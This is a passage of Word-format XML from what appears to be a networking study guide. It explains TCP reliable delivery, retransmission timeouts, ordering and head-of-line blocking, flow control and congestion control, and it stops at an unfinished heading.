    <w:p w14:paraId="48A8C79C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP Fast Open (TFO):</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Allows data in the SYN packet itself (saving 1 RTT on repeat connections). Client includes a cookie from a previous connection → server validates and processes data immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFE76D4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Reliable Delivery — How TCP Guarantees Every Byte Arrives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76215D9B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79110528" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1370"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Sender assigns a sequence number to every byte.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFFC77E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1370"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Sender transmits data (segment = chunk of bytes with starting sequence number).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B94FF46" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1370"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Receiver acknowledges: "I've received everything up to byte X" (cumulative ACK).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E11D362" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1370"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>If sender doesn't receive ACK within a timeout → retransmits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE71DDC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597150CB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B356DB6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Sender sends:   [seq=1000, 500 bytes] [seq=1500, 500 bytes] [seq=2000, 500 bytes]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBEC385" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Receiver ACKs:  ack=1500 ("got up to 1500")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605FAE70" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">                ack=2000 ("got up to 2000")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B3F8E5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">                (no ack for 2000–2500 — packet lost)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00604CDA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="0970EAA4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Sender timeout: retransmits [seq=2000, 500 bytes]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE645D5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Receiver ACKs:  ack=2500 ("now I have everything")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C11E3B2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retransmission timeout (RTO) calculation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355900BA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>TCP maintains a running estimate of RTT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327DA9FA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EE9D76" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>SRTT = (1-α) × SRTT + α × measured_RTT        (smoothed RTT, α=1/8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721B6FD6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>RTTVAR = (1-β) × RTTVAR + β × |measured_RTT - SRTT|   (variance, β=1/4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219E58E2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>RTO = SRTT + 4 × RTTVAR                                (timeout = RTT + safety margin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C49E8E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>If RTT is 50ms with low variance: RTO ≈ 200ms. If RTT is 50ms with high jitter: RTO ≈ 500ms+.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C03A03A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fast Retransmit (don't wait for timeout):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1226A777" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1371"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>If sender receives 3 duplicate ACKs (same ack number 3 times) → infer packet was lost → retransmit immediately WITHOUT waiting for RTO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF34443" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1371"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Much faster recovery: milliseconds instead of RTO (which could be 200ms+).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628EBBD8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 Ordering — How TCP Delivers In-Order Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C930E7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Packets can arrive out of order (different network paths, variable queuing delays).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7965C2D0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP's solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEFAEE8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3915D22C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Sender sends: seq=1000, seq=1500, seq=2000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152CBE4D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>Network delivers to receiver: seq=2000 (arrived first), seq=1000, seq=1500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708D3B0E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="751F72EE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Receiver's reordering buffer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52891590" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Received seq=2000 → buffer it (can't deliver to application — gap at 1000–1999)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700D0DF3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Received seq=1000 → buffer it (still missing 1500–1999)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDD1EE9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Received seq=1500 → buffer it → NOW continuous from 1000–2499 → deliver to application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F79F65" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>The receiver holds out-of-order data in a buffer until the gap is filled, then delivers everything in sequence to the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AABBDC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The head-of-line (HOL) blocking problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF5BC6A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>If packet with seq=1000 is lost, but seq=1500 and seq=2000 arrive:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644A1203" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1372"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Application receives NOTHING until seq=1000 is retransmitted and arrives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A1DF53" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1372"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Bytes 1500–2499 are sitting in the buffer, ready, but BLOCKED by the missing earlier bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45012BA6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1372"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>This is HOL blocking — a single lost packet stalls the entire stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F4577E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why HOL blocking is TCP's biggest weakness for multiplexed protocols (HTTP/2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CD74F6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>HTTP/2 multiplexes many requests over one TCP connection. If ONE packet is lost:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550CC254" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1373"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>ALL streams are blocked (even if the lost packet belongs to only one stream).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6587FCDC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1373"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Request A's lost packet blocks Request B, C, D from being delivered to the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFC76CA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1373"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>This is why HTTP/3 uses QUIC (UDP-based) — per-stream ordering, no cross-stream HOL blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C65E851" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.4 Flow Control — Preventing Receiver Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8E4977" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Sender might send data faster than the receiver can process it → receiver buffer overflows → data lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A50C36" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP's solution — Receive Window:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD22D03" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Receiver advertises: "I have X bytes of buffer space available."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7915AB2C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F54A427" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>Receiver: window=16384 (I can accept 16 KB more)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2A5F08" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Sender: sends 8 KB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8CA134" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Receiver: window=8192 (received 8 KB, haven't processed yet, only 8 KB left)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771125EC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Sender: sends 4 KB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E8CD5C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Receiver: window=4096</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691B41B9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B54759" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Receiver: window=0 (buffer full — STOP SENDING!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267F05D0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Sender: stops, waits for window update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720EC64A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Receiver processes data, frees buffer → window=16384 (window update)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD9FAE5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Sender: resumes sending</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347B0054" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This is purely end-to-end</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> — between sender and receiver only. Not related to network congestion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC867E3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 Congestion Control — Not Overwhelming the Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C465358" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Multiple senders sharing a network link. If all send at full speed → link is saturated → packets dropped → retransmissions → more congestion → collapse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F835C0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP's solution — Congestion Window (cwnd):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D32FE55" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>The sender maintains a second limit (in addition to receive window):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2853FF30" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3971951A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Effective window = min(receive_window, congestion_window)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5571D6EB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Slow Start (exponential growth):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4ED25C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E8D6DB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>cwnd starts at: ~14 KB (10 segments)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24877BAF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Each ACK: cwnd += 1 MSS (effectively doubles per RTT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA0A02B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Growth: 14 KB → 28 KB → 56 KB → 112 KB → 224 KB → ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392D8948" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Until: packet loss detected OR ssthresh reached</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F86C25" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Congestion Avoidance (linear growth):</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> After ssthresh, cwnd grows by 1 MSS per RTT (additive increase).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F598AE1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>On packet loss:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19319F80" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1374"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CUBIC (Linux default):</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> cwnd reduced to ~70% of current value. Cubic function regrowth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC0A919" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1374"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BBR (Google):</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Doesn't use loss as congestion signal. Models bandwidth and RTT directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D23F561" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why congestion control matters for system design:</w:t>
      </w:r>
    </w:p>
